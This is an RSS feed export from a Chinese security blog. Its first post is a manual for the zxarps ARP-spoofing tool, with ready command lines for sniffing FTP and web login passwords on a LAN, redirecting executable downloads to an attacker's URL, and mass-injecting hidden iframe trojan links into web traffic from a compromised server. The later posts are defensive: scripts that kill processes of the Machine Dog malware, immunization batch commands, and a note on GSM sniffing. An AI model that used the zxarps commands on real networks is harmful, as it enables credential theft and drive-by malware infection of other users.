<p><font color="#ff0000">基于<strong>ARP欺骗</strong>的东东，可<strong>网页插马</strong>，<strong>DNS欺骗</strong>，<strong>自定义关键字嗅探</strong>等</font></p>
<p><strong>网络地址信息：</strong></p>
<blockquote><p>0. Realtek RTL8139</p>
<p>IP Address. . . . . : 192.168.1.101</p>
<p>Physical Address. . : 00-11-D8-6B-5E-19</p>
<p>Default Gateway . . : 192.168.1.1</p>
<p>1. WAN (PPP/SLIP) Interface</p>
<p>IP Address. . . . . : xx.xx.xx.xx</p>
<p>Physical Address. . : 00-52-00-00-00-00</p>
<p>Default Gateway . . : xx.xx.xx.xx</p></blockquote>
<p><strong>options（</strong><strong>参数说明</strong><strong>）:</strong></p>
<blockquote><p>-idx [index] 网卡索引号</p>
<p>-ip [ip] 欺骗的IP,用&#8217;-'指定范围,&#8217;,'隔开</p>
<p>-sethost [ip] 默认是网关,可以指定别的IP</p>
<p>-port [port] 关注的端口,用&#8217;-'指定范围,&#8217;,'隔开,没指定默认关注所有端口</p>
<p>-reset 恢复目标机的ARP表</p>
<p>-hostname 探测主机时获取主机名信息</p>
<p>-logfilter [string]设置保存数据的条件，必须+-_做前缀,后跟关键字,</p>
<p>&#8216;,&#8217;隔开关键字,多个条件&#8217;|'隔开</p>
<p>所有带+前缀的关键字都出现的包则写入文件</p>
<p>带-前缀的关键字出现的包不写入文件</p>
<p>带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)</p>
<p>-save_a [filename] 将捕捉到的数据写入文件 ACSII模式</p>
<p>-save_h [filename] HEX模式</p>
<p>-hacksite [ip] 指定要插入代码的站点域名或IP,</p>
<p>多个可用&#8217;,'隔开,没指定则影响所有站点</p>
<p>-insert [html code]指定要插入html代码</p>
<p>-postfix [string] 关注的后缀名，只关注HTTP/1.1 302</p>
<p>-hackURL [url] 发现关注的后缀名后修改URL到新的URL</p>
<p>-filename [name] 新URL上有效的资源文件名</p>
<p>-hackdns [string] DNS欺骗，只修改UDP的报文,多个可用&#8217;,'隔开</p>
<p>格式: 域名|IP，www.aa.com|222.22.2.2,www.bb.com|1.1.1.1</p>
<p>-Interval [ms] 定时欺骗的时间间隔，默认是3秒</p>
<p>-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者</p>
<p>-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB</p></blockquote>
<p><strong>例子代码:</strong></p>
<p><strong>嗅探指定的IP段中端口80的数据，并以HEX模式写入文件</strong></p>
<p>zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log</p>
<p><strong>FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件</strong></p>
<p>zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter &#8220;_USER ,_PASS&#8221; -save_a sniff.log</p>
<p><strong>HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字</strong></p>
<p>zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter &#8220;+POST ,+user,+pass&#8221; -save_a sniff.log</p>
<p><strong>用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探</strong></p>
<p>zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter &#8220;+POST ,+user,+pass|_USER ,_PASS&#8221; -save_a sniff.log</p>
<p><strong>如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe</strong></p>
<p>zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix &#8220;.exe,.rar,.zip&#8221; -hackurl http://xx.net/ -filename test.exe</p>
<p><strong>指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun</strong></p>
<p>zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert &#8220;just for fun</p>
<p><strong><font color="#ff0000">arp欺骗批量挂马</font> </strong><br />
zxarps.exe  （ARP欺骗tool）</p>
<blockquote><p><font color="#0000ff">3389 肉鸡一台最好是服务器 或者内网机器命令： zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert &#8220;&lt;iframe src=&#8217;xx&#8217; width=0 height=0&gt;&#8221;</font><br />
<font color="#0000ff">这里网马地址就假设为  http://www.baidu.com/ </font><br />
<font color="#0000ff">那么命令就是zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert &#8220;&lt;iframe src=&#8217;http://www.baidu.com/&#8217; width=0 height=0&gt;&#8221;</font><br />
<font color="#0000ff">接着上 3389 服务器 服务器必须安装 winPcap.exe 工具都有打包然后就执行</font><br />
<font color="#0000ff">zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert &#8220;&lt;iframe src=&#8217;http://www.baidu.com/&#8217; width=0 height=0&gt;&#8221; </font><br />
<font color="#0000ff">IP 自己改看看效果 ！！！！！  绝对好用 自己试就知道了  这样挂马可是同网段好几个服务器的站基本都挂上你的马了只要别人访问这IP段中的某一个服务器上的站那么就自动欺骗插入我们的网马代码 </font></p></blockquote>
<p>防御办法：若为win系统推荐使用360arp防火墙</p>
<p>通用办法：对客户机和网关做双向ip-mac地址绑定，最好使用交换机替代集线器。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/search-engine/show-diff-between-crawlers-and-guests-php-code-1787/" rel="bookmark" title="Permanent Link: 向访客和爬虫显示不同内容的PHP代码">向访客和爬虫显示不同内容的PHP代码</a></li><li><a href="http://clin003.com/wiki/mediawiki-short-url-1103/" rel="bookmark" title="Permanent Link: mediawiki页面伪静态配置调试">mediawiki页面伪静态配置调试</a></li><li><a href="http://clin003.com/wp-use/wordpress-show-tags-388/" rel="bookmark" title="Permanent Link: wordpress文章post中显示tags的办法">wordpress文章post中显示tags的办法</a></li><li><a href="http://clin003.com/ideas/hainei-show-435/" rel="bookmark" title="Permanent Link: 初体验海内网：海内可以注册啦?">初体验海内网：海内可以注册啦?</a></li><li><a href="http://clin003.com/ideas/discuz-adsense-show-1789/" rel="bookmark" title="Permanent Link: Discuz 论坛中的 AdSense 显示问题终于解决啦">Discuz 论坛中的 AdSense 显示问题终于解决啦</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/zxarps-show-512/" >http://clin003.com/safe/zxarps-show-512/</a> <br /> <a href="http://clin003.com/safe/zxarps-show-512/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/zxarps-show-512/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>手机嗅探扫描，窃&#8230;</title>
		<link>http://clin003.com/safe/phone-sniffer-484/</link>
		<comments>http://clin003.com/safe/phone-sniffer-484/#comments</comments>
		<pubDate>Sun, 02 Mar 2008 03:45:12 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[Phone sniffer]]></category>
		<category><![CDATA[嗅探]]></category>
		<category><![CDATA[手机]]></category>

		<guid isPermaLink="false">http://clin003.com/safe/phone-sniffer-484.shtml</guid>
		<description><![CDATA[先是看到国内的gsm服务商并没有加密数据通讯，又看到手机短信被嗅探窃看的截图（不是我抓得厄） 中国的GSM到底是不是加密的：http://hi.baidu.com/tombkeeper/blog/item/534571d9edcef22811df9bd2.html 手机打电话是可以窃听的?短信也同样？http://hi.baidu.com/tombkeeper/blog/item/49ac4043a14b15159213c636.html 人家移动老总不是说过嘛：“你是谁，你在哪里，我们都知道”。 。。。 Related posts:看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马Testing phone postGmail要求手机验证怎么办 (国家列表中没有China)E2手机病毒?用telnet检测网址返回的头部信息状态码Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/safe/phone-sniffer-484/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>先是看到国内的gsm服务商并没有加密数据通讯，又看到手机短信被嗅探窃看的截图（不是我抓得厄）</p>
<p>中国的GSM到底是不是加密的：http://hi.baidu.com/tombkeeper/blog/item/534571d9edcef22811df9bd2.html</p>
<p>手机打电话是可以窃听的?短信也同样？http://hi.baidu.com/tombkeeper/blog/item/49ac4043a14b15159213c636.html</p>
<p><img src="http://clin003.com/wp-content/uploads/2008/03/sms.jpg" alt="手机打电话是可以窃听的?短信也同样？重要的事情，面谈最可靠。" /></p>
<p>人家移动老总不是说过嘛：“你是谁，你在哪里，我们都知道”。</p>
<p>。。。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/technical-analysis/zhang-yi-limitations-of-using-a-mobile-phone-to-set-aside-pc-trojan-defense-authorization-546/" rel="bookmark" title="Permanent Link: 看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马">看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马</a></li><li><a href="http://clin003.com/about/testing-phone-post-183/" rel="bookmark" title="Permanent Link: Testing phone post">Testing phone post</a></li><li><a href="http://clin003.com/ideas/gmail-receive-a-text-message-with-a-password-reset-code-on-your-mobile-phone-2057/" rel="bookmark" title="Permanent Link: Gmail要求手机验证怎么办 (国家列表中没有China)">Gmail要求手机验证怎么办 (国家列表中没有China)</a></li><li><a href="http://clin003.com/exploits/e2-phone-menu-215/" rel="bookmark" title="Permanent Link: E2手机病毒?">E2手机病毒?</a></li><li><a href="http://clin003.com/servers/detection-using-telnet-to-return-at-the-head-of-the-state-code-information-450/" rel="bookmark" title="Permanent Link: 用telnet检测网址返回的头部信息状态码">用telnet检测网址返回的头部信息状态码</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/phone-sniffer-484/" >http://clin003.com/safe/phone-sniffer-484/</a> <br /> <a href="http://clin003.com/safe/phone-sniffer-484/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/phone-sniffer-484/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>usrinit.exe</title>
		<link>http://clin003.com/safe/usrinit-370/</link>
		<comments>http://clin003.com/safe/usrinit-370/#comments</comments>
		<pubDate>Tue, 15 Jan 2008 13:00:09 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[病毒学习]]></category>
		<category><![CDATA[网吧经验谈]]></category>
		<category><![CDATA[explorer]]></category>
		<category><![CDATA[userinit.exe]]></category>
		<category><![CDATA[usrinit.exe]]></category>
		<category><![CDATA[机器狗]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/safe/usrinit-370.shtml</guid>
		<description><![CDATA[usrinit.exe 应该是最近闹得很火的机器狗病毒产生的假冒系统文件.可以直接中止,感染正常的系统文件userinit.exe不修改时间和大小只改文件内容。 usrinit.exe档案 W32.Kedebe.E@mm的一个组件 病毒名称：W32.Kedebe.E@mm 病毒类型：蠕虫 发现日期：2005年7月12日 危害程度：蠕虫复制自身为系统文件夹下的[一个不可打印字符][文件名]，不可打印字符表示为0xA0，在不同操作系统下的显示不同，文件名为如下之一： nbtstat.exe、usrinit.exe、user.exe、winhlp32.exe、telnet.exe、locator.exe、 recover.exe、logman.exe、dlhost.exe、logonui.exe、winspol.exe、services.exe、 svchost.exe、lsas.exe、rundl32.exe、regedt32.exe、winlogon.exe、wuauclt.exe。在 记事本中打开临时文件夹下的[初始文件名].txt文件并显示如下文本：This document cannot be run under older versions. Please install latest version of Notepad. [随机文本]。从带有特定扩展名的文件中收集邮件地址，向收集到的地址发送自身副本。。试图终止带有某些文本的进程并删除相关文件以降低安全设置。向 hosts文件增加条目以阻止对一些与安全相关网站的访问。删除一些安全程序的文件！ 阻止usrinit.exe 可以使用机器狗病毒的专杀工具（目前还没发现好用的专杀工具）建议是用免疫工具（超级巡警有个机器狗免疫程序），然后可以建立个开机运行脚本检查进程中是否有usrinit.exe进程，如果有就立即中止。 脚本类似： wmic process where name=”userinit.exe” call terminate wmic process where name=”usrinit.exe” &#8230; <a href="http://clin003.com/safe/usrinit-370/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p class="hdwiki_tmml"><font color="#008000"><strong>usrinit.exe</strong></font></p>
<p><font color="#008000"> 应该是最近闹得很火的机器狗病毒产生的假冒系统文件.可以直接中止,感染正常的系统文件userinit.exe不修改时间和大小只改文件内容。</font></p>
<p class="hdwiki_tmml"><font color="#ff6600"><strong>usrinit.exe档案</strong></font></p>
<p><font color="#ff6600">  			              			W32.Kedebe.E@mm的一个组件</p>
<p>病毒名称：W32.Kedebe.E@mm<br />
病毒类型：蠕虫</p>
<p>发现日期：2005年7月12日</p>
<p>危害程度：蠕虫复制自身为系统文件夹下的[一个不可打印字符][文件名]，不可打印字符表示为0xA0，在不同操作系统下的显示不同，文件名为如下之一： nbtstat.exe、usrinit.exe、user.exe、winhlp32.exe、telnet.exe、locator.exe、 recover.exe、logman.exe、dlhost.exe、logonui.exe、winspol.exe、services.exe、 svchost.exe、lsas.exe、rundl32.exe、regedt32.exe、winlogon.exe、wuauclt.exe。在 记事本中打开临时文件夹下的[初始文件名].txt文件并显示如下文本：This document cannot be run under older versions. Please install latest version of Notepad. [随机文本]。从带有特定扩展名的文件中收集邮件地址，向收集到的地址发送自身副本。。试图终止带有某些文本的进程并删除相关文件以降低安全设置。向 hosts文件增加条目以阻止对一些与安全相关网站的访问。删除一些安全程序的文件！</font></p>
<p class="hdwiki_tmml"><font color="#ff0000"><strong>阻止usrinit.exe</strong></font></p>
<p><font color="#ff0000"><strong>可以使用机器狗病毒的专杀工具（目前还没发现好用的专杀工具）建议是用免疫工具（超级巡警有个机器狗免疫程序），然后可以建立个开机运行脚本检查进程中是否有usrinit.exe进程，如果有就立即中止。</strong></font><br />
脚本类似：</p>
<p><font color="#0000ff">wmic process where name=”userinit.exe” call  terminate<br />
wmic process where name=”usrinit.exe” call  terminate</font><br />
<font color="#ff6600">该代码的的意思是：当发现进程里有userinit.exe时，即关闭；当发现进程里有usrinit.exe时，也关闭。因为批处理在winlogon后运行，所以病毒刚启动，就被杀掉了。这样也就失去了下载其它病毒的机会。</font>不过，缺点是它只运行一次。这两代批处理的基础上，加入了每秒检查进程，一发现即终止的vbs脚本：</p>
<p><font color="#0000ff">do while(1)<br />
strComputer = “.”<br />
Set objWMIService =  GetObject(”winmgmts:” _<br />
&amp; “{impersonationLevel=impersonate}!\\” &amp;  strComputer &amp; “\root\cimv2″)</font></p>
<p><font color="#0000ff">Set colProcessList1 = objWMIService.ExecQuery _<br />
(”Select * from  Win32_Process Where Name = ‘userinit.exe’”)<br />
For Each objProcess1 in  colProcessList1<br />
objProcess1.Terminate()<br />
Next</font></p>
<p><font color="#0000ff">Set colProcessList2 = objWMIService.ExecQuery _<br />
(”Select * from  Win32_Process Where Name = ‘usrinit.exe’”)<br />
For Each objProcess2 in  colProcessList2<br />
objProcess2.Terminate()<br />
Next</font></p>
<p><font color="#0000ff">Set colProcessList3 = objWMIService.ExecQuery _<br />
(”Select * from  Win32_Process Where Name = ‘conime0.exe’”)<br />
For Each objProcess3 in  colProcessList3<br />
objProcess3.Terminate()<br />
Next</font></p>
<p><font color="#0000ff">Wscript.Sleep(1000)<br />
Loop</font><br />
<font color="#ff6600">这段vbs脚本的机制和以上两段代码有异曲同工之妙。</font>不过，用了无限循环语句，实现了对进程的动态监控，使得被监控进程无法运行。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/netbar/arp-deception-and-the-rogue-virus-immune-simple-batch-scripts-bat-422/" rel="bookmark" title="Permanent Link: arp欺骗和机器狗病毒简单免疫批处理脚本(bat)">arp欺骗和机器狗病毒简单免疫批处理脚本(bat)</a></li><li><a href="http://clin003.com/safe/immune-dog-363/" rel="bookmark" title="Permanent Link: 免疫机器狗">免疫机器狗</a></li><li><a href="http://clin003.com/netbar/trojan-downloader-win32-rodog-gen-360/" rel="bookmark" title="Permanent Link: 机器狗">机器狗</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/usrinit-370/" >http://clin003.com/safe/usrinit-370/</a> <br /> <a href="http://clin003.com/safe/usrinit-370/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/usrinit-370/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>杀毒,作系统,刻盘,头都大啦</title>
		<link>http://clin003.com/safe/antivirus-system-ghost-369/</link>
		<comments>http://clin003.com/safe/antivirus-system-ghost-369/#comments</comments>
		<pubDate>Tue, 15 Jan 2008 12:26:18 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[病毒学习]]></category>
		<category><![CDATA[网吧经验谈]]></category>
		<category><![CDATA[Arp]]></category>
		<category><![CDATA[arp攻击]]></category>
		<category><![CDATA[linkinfo.dll]]></category>
		<category><![CDATA[userinit.exe]]></category>
		<category><![CDATA[usrinit.exe]]></category>
		<category><![CDATA[机器狗]]></category>
		<category><![CDATA[母盘制作]]></category>
		<category><![CDATA[病毒]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/ideas/antivirus-system-ghost-369.shtml</guid>
		<description><![CDATA[机器狗,应该是这个病毒吧c:\windows\linkinfo.dll文件，一直杀不掉，用超级巡警的机器狗免疫程序也貌似没用。360搞得死去活来，一直报阿报。 超级巡警干脆让系统死机（关于司机原因目前还不清楚是不是因为超级巡警，由于装拉超级巡警的机子无一例外的死机，到现在还没时间去仔细研究死因。） 这次作的新系统可能没有格盘的原因或这是我激活其他分区的病毒感染程序，刚做完就带病毒（系统看起来没啥问题），这次使用开机运行脚本驻留内存不断循环的查杀userinit.exe和usrinit.exe进程，还有开机就吧网络连接断开（因为linkinfo.dll是个下载者）或者开着360先暂时拦截着他下在其他更多的木马，然后用360修复系统漏洞，最好大全，欧一口气打啦112个漏洞，其中两个是在带有网络连接的安全模式下打的。 然后从下载好压缩包中解压微点主动防御软件装上然后升级重起，然后配置微点，由于批量的电脑等着用这个系统就最好用静默方式处理恶意程序和发现的病毒，并且处在内网，所以绑定拉网关防止arp攻击。 添加信任程序（需要提醒的是对于小的程序并且有压缩包的绿色程序建议重新解压下覆盖已经有的程序，因为这群病毒可能已经感染拉你的可执行程序exe文件）。 如果你不用微点，那么建议你无论如何也要做使用专业的杀软做一次全盘扫描（专业对于360和超级巡警应该不能考虑进来的说！！个人见解他们只是杀毒的辅助工具而已）。 然后该干啥干啥，偶接下来做的是优化系统，根据需要配置系统设置。 然后重起备份系统分区，刻盘测试。。 关于机子死因： 病毒和杀毒软件谁也打不多谁最终系统牺牲。 arp攻击，防arp的软件(360arp防火墙和超级巡警防arp模块)低档不了，这个可能性比较小的说，因为死机期间360发现的arp攻击和超级巡警发现的arp攻击都不多，差不多一个小时就会死掉（鼠标不动,键盘无响应）。 受到网络拒绝服务攻击（感觉这个可能性比较大的说，可以和第一个原因相提并论），所以这次打补丁就特意先打上能够引起拒绝服务攻击的几个不定，具体的漏洞编号不记得啦，大概2007年11月有个tcp协议的漏洞什么的可以造成拒绝服务攻击。 还有原因么想不起来啦，应用程序在受到病毒前一直运行正常没发现过冲突。 硬件上也没发现啥冲突。 死机系统环境： xp2电脑公司ghost版 克隆卡一个主机三个用户同时用 512和1g的内存 p4 双核3.0cpu和酷睿双核1.6的cpu 80G硬盘 over 最后说句:那病毒如果不把系统搞的死掉我还是会给他留个生存的空间的.前提是保证系统正常稳定的运行被使用. Related posts:病毒分析技术课程PDF版本今天我让U盘只读不写！从命令行查杀病毒『金山毒霸』安装Ghost系统出现 &#8220;unist specified don&#8217;t exist. shsucdx can&#8217;t install&#8221; 解决杀毒软件引擎技术之窥探Copyright &#169; 2007-2010 This feed is building by &#8230; <a href="http://clin003.com/safe/antivirus-system-ghost-369/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><font color="#0000ff">机器狗,应该是这个病毒吧<strong>c:\windows\linkinfo.dll</strong>文件，一直杀不掉，用超级巡警的机器狗免疫程序也貌似没用。360搞得死去活来，一直报阿报。</font></p>
<p><font color="#0000ff">超级巡警干脆让系统死机（关于司机原因目前还不清楚是不是因为超级巡警，由于装拉超级巡警的机子无一例外的死机，到现在还没时间去仔细研究死因。）</font></p>
<p><font color="#0000ff">这次作的新系统可能没有格盘的原因或这是我激活其他分区的病毒感染程序，刚做完就带病毒（系统看起来没啥问题），这次使用开机运行脚本驻留内存不断循环的查杀userinit.exe和usrinit.exe进程，还有开机就吧网络连接断开（因为linkinfo.dll是个下载者）或者开着360先暂时拦截着他下在其他更多的木马，然后用360修复系统漏洞，最好大全，欧一口气打啦112个漏洞，其中两个是在带有网络连接的安全模式下打的。</font></p>
<p><font color="#0000ff">然后从下载好压缩包中解压微点主动防御软件装上然后升级重起，然后配置微点，由于批量的电脑等着用这个系统就最好用静默方式处理恶意程序和发现的病毒，并且处在内网，所以绑定拉网关防止arp攻击。</font></p>
<p><font color="#0000ff">添加信任程序（需要提醒的是对于小的程序并且有压缩包的绿色程序建议重新解压下覆盖已经有的程序，因为这群病毒可能已经感染拉你的可执行程序exe文件）。</font></p>
<p><font color="#0000ff">如果你不用微点，那么建议你无论如何也要做使用专业的杀软做一次全盘扫描（专业对于360和超级巡警应该不能考虑进来的说！！个人见解他们只是杀毒的辅助工具而已）。</font></p>
<p><font color="#0000ff">然后该干啥干啥，偶接下来做的是优化系统，根据需要配置系统设置。</font></p>
<p><font color="#0000ff">然后重起备份系统分区，刻盘测试。。</font></p>
<p><font color="#ff0000"><strong>关于机子死因：</strong></font><br />
<span id="more-369"></span><br />
<font color="#ff0000">病毒和杀毒软件谁也打不多谁最终系统牺牲。</font></p>
<p><font color="#ff0000">arp攻击，防arp的软件(360arp防火墙和超级巡警防arp模块)低档不了，这个可能性比较小的说，因为死机期间360发现的arp攻击和超级巡警发现的arp攻击都不多，差不多一个小时就会死掉（鼠标不动,键盘无响应）。</font></p>
<p><font color="#ff0000">受到网络拒绝服务攻击（感觉这个可能性比较大的说，可以和第一个原因相提并论），所以这次打补丁就特意先打上能够引起拒绝服务攻击的几个不定，具体的漏洞编号不记得啦，大概2007年11月有个tcp协议的漏洞什么的可以造成拒绝服务攻击。</font></p>
<p><font color="#ff0000">还有原因么想不起来啦，应用程序在受到病毒前一直运行正常没发现过冲突。</font></p>
<p><font color="#ff0000">硬件上也没发现啥冲突。</font></p>
<p><font color="#ff0000"><strong>死机系统环境：</strong></font></p>
<p><font color="#ff0000">xp2电脑公司ghost版</font></p>
<p><font color="#ff0000">克隆卡一个主机三个用户同时用</font></p>
<p><font color="#ff0000">512和1g的内存</font></p>
<p><font color="#ff0000">p4 双核3.0cpu和酷睿双核1.6的cpu</font></p>
<p><font color="#ff0000">80G硬盘</font></p>
<p><font color="#ff0000">over</font></p>
<p><font color="#ff0000">最后说句:那病毒如果不把系统搞的死掉我还是会给他留个生存的空间的.前提是保证系统正常稳定的运行被使用.</font></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/suggested-contents/malware-analysis-and-antivirus-technologies-1113/" rel="bookmark" title="Permanent Link: 病毒分析技术课程PDF版本">病毒分析技术课程PDF版本</a></li><li><a href="http://clin003.com/netbar/hklm-system-currentcontrolset-control-storagedevicepolicies-writeprotect-1865/" rel="bookmark" title="Permanent Link: 今天我让U盘只读不写！">今天我让U盘只读不写！</a></li><li><a href="http://clin003.com/safe/from-the-command-line-killing-virus-by-kingsoft-antivirus-600/" rel="bookmark" title="Permanent Link: 从命令行查杀病毒『金山毒霸』">从命令行查杀病毒『金山毒霸』</a></li><li><a href="http://clin003.com/netbar/ghost-unist-specified-dont-exist-shsucdx-cant-install-1862/" rel="bookmark" title="Permanent Link: 安装Ghost系统出现 &#8220;unist specified don&#8217;t exist. shsucdx can&#8217;t install&#8221; 解决">安装Ghost系统出现 &#8220;unist specified don&#8217;t exist. shsucdx can&#8217;t install&#8221; 解决</a></li><li><a href="http://clin003.com/safe/antivirus-software-engine-technology-to-snoop-102/" rel="bookmark" title="Permanent Link: 杀毒软件引擎技术之窥探">杀毒软件引擎技术之窥探</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/antivirus-system-ghost-369/" >http://clin003.com/safe/antivirus-system-ghost-369/</a> <br /> <a href="http://clin003.com/safe/antivirus-system-ghost-369/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/antivirus-system-ghost-369/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>免疫机器狗</title>
		<link>http://clin003.com/safe/immune-dog-363/</link>
		<comments>http://clin003.com/safe/immune-dog-363/#comments</comments>
		<pubDate>Sat, 12 Jan 2008 04:34:20 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[Rootkit]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[病毒学习]]></category>
		<category><![CDATA[网吧经验谈]]></category>
		<category><![CDATA[免疫]]></category>
		<category><![CDATA[机器狗]]></category>
		<category><![CDATA[病毒]]></category>
		<category><![CDATA[网吧]]></category>
		<category><![CDATA[补丁]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/safe/immune-dog-363.shtml</guid>
		<description><![CDATA[增加系统** 当机器狗刚出现时，就有人写出了相应的免疫批处理代码，如下： md %systemroot%\system32\drivers\pcihdd.sys cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n cacls %systemroot%\system32\userinit.exe /e /p everyone:r exit 按说，这段代码对于最早的机器狗病毒（10月17日之前）是管用的。机器狗病毒早期的确生成了pcihdd.sys文件.而且还修改了 userinit.exe文件。基于这两点出发，建立一个pcihdd.sys的目录，以及设置userinit.exe的访问权限是管用的。 然而，病毒作者很快发现了这一点。他迅速的在后期的版本中，也加入了批处理的内容。即对以上批处理作了个反向工程，解除设置的权限，删除免疫目录，还是修改userinit.exe文件，达到加载其它病毒木马的目的。 后来，为了防止目录被删掉，有些强人更是出怪招，在pcihdd.sys目录下再建个怪异的目录名，形如&#8221;ty&#8230;/&#8221;的目录。这个目录用批处理是可以建立的，但是不可删除。同样，建了这个目录，pcihdd.sys目录也就不可删除了。 在后期变种中，病毒不再使用pcihdd.sys的这文件为驱动，改成了其他的文件名，比如笔者今天发现的变种，驱动名就是comint32.sys.. 这样子看来，基于文件名的防疫方式宣告失败。有人还在不停的建那些怪异目录，以图防疫机器狗病毒。可这样子下去，你的系统里为增添多少**目录？你最后，你自己也没法删除这些**，甚至不得不格式化硬盘。 封域名，封IP 早期机器狗病毒，可以通过简单的反汇编工具，找到相应的下载病毒的网址。后期的机器狗病毒变种，也可通过查看中毒机器的IE临时文件找到下载病毒的网址。 机器狗病毒被各种检测方式很快被找到了，其ip地址和域名也能被发现。于是，在服务器或路由器里封掉这些域名或IP，的确可以有效防治它。然而，恶梦不会因此而结束。据笔者自身封的IP和域名，目前加起来已多达三十多个。还不包括每天都要新的域名或IP被以各种方式发现出来。 ROS里脚本在无限的加长些，路由器里的列表也就无限的增长着。这样的日子，我们看不到尽头在哪儿。 两行批处理，问题看是搞定，但也治标不治本 随着对机器狗病毒研究的深入，大家都一致发现了问题的关键在于userinit.exe和usrinit.exe（后期变种）文件。基于这点出发，可以使用以下两个批处理搞定问题： wmic process where name=&#8221;userinit.exe&#8221; call terminate wmic process where name=&#8221;usrinit.exe&#8221; call terminate 这是批处理高手写的，果然非同反响。该代码的的意思是：当发现进程里有userinit.exe时，即关闭；当发现进程里有usrinit.exe时，也关闭。因为批处理在winlogon后运行，所以病毒刚启动，就被杀掉了。这样也就失去了下载其它病毒的机会。不过，缺点是它只运行一次。这两代批处理的基础上，加入了每秒检查进程，一发现即终止的vbs脚本： &#8230; <a href="http://clin003.com/safe/immune-dog-363/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>增加系统**</p>
<p>当机器狗刚出现时，就有人写出了相应的免疫批处理代码，如下：</p>
<p><font color="#0000ff">md %systemroot%\system32\drivers\pcihdd.sys<br />
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n<br />
cacls %systemroot%\system32\userinit.exe /e /p everyone:r<br />
</font><font color="#0000ff">exit</font><br />
按说，这段代码对于最早的机器狗病毒（10月17日之前）是管用的。机器狗病毒早期的确生成了<strong>pcihdd.sys</strong>文件.而且还修改了 <strong>userinit.exe</strong>文件。基于这两点出发，建立一个<strong>pcihdd.sys</strong>的目录，以及设置<strong>userinit.exe</strong>的访问权限是管用的。</p>
<p>然而，病毒作者很快发现了这一点。他迅速的在后期的版本中，也加入了批处理的内容。即对以上批处理作了个反向工程，解除设置的权限，删除免疫目录，还是修改userinit.exe文件，达到加载其它病毒木马的目的。<br />
